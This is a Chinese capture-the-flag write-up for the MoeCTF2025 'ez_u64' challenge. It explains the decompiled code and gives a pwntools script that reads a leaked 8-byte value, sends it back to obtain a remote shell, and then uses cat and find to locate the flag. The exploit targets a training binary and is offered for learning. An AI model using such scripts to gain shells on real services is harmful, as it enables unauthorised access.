题目:MoeCTF2025_ez_u64
日期:2025.8.27
题目程序伪代码:
unsigned __int64 vuln()
{
__int64 v1; // [rsp+0h] [rbp-10h] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Ya hello! Let's play a game.");
printf("Guess which number I'm thinking of.");
printf("Here is the hint.");
write(1, &num, 8uLL);
printf("\n>");
__isoc99_scanf("%zu", &v1);
if ( v1 != num )
{
puts("Wrong answer!");
puts("Try pwntools u64?");
exit(1);
}
puts("Win!");
system("/bin/sh");
return v2 - __readfsqword(0x28u);
}
要点解析:
#unsigned __int64:定义无符号整数(0或正数)
#__int64:定义有符号整数
#puts:自带换行符的printf
#write:底层输出函数,直接输出原始数据
##1:文件描述符,1代表标准输出(屏幕)
##&num:num变量的地址(&是取地址运算符)
##8uLL:输出8字节,uLL表示“unsigned Long Long”
#%zu:格式说明符。z表示size_t类型,u表示无符号整数。
##size_t:一个无符号整数类型,专门用于表示对象的大小、数组索引和内存分配的大小
#exit(1):表示异常退出,1是错误代码
#system(“/bin/sh”):创建一个新的shell进程,这个shell会继承当前程序的权限和上下文环境
##工作原理:
###1.调用fork()创建一个新的子进程
###2. 在子进程中调用exec()系列函数来执行指定的命令
###3. 父进程等待子进程结束(除非使用&后台运行)
#shell:一个“命令解释器”,它是用户(无论是真人用户还是程序)和操作系统内核之间的桥梁。 我们通过它来安全、方便地指挥计算机做事。
脚本代码:
from pwn import * # 导入 pwntools。
context(arch='amd64', os='linux', log_level='debug') # 一些基本的配置。
io = remote('ip',端口)
io.recvuntil(b'hint.')
leak = io.recv(8)
print (leak)
output = u64(leak)
print (output)
print (hex(output))
print (str(output))
print (p64(output))
io.sendlineafter(b'>',str(output))
io.interactive()
要见解析:
#io:变量名,约定俗成,取自Input/Output(输入/输出),通过该变量与目标程序进行通信
#remote:创建与远程服务器的连接
#recv:receive,接收字节序列
##recvuntil:接收到目标字节序列就停止接收
#recv(8):精确接收8字节数据
#hex:将一个整数转换成以‘0x’为前缀的小写十六进制字符串
#u64:将小端序字节数据转换为python整数
#sendline:发送数据
#sendlineafter:等待特定提示后发送数据并添加换行符
#interactive:将控制权交给用户,进入交互式shell
获得shell后:
#cat+文件名:将文件内容全部读取并一次性显示在终端上
#find / -name “flag” 2>/dev/null:在全系统查找包含“flag”的文件

被折叠的 条评论
为什么被折叠?



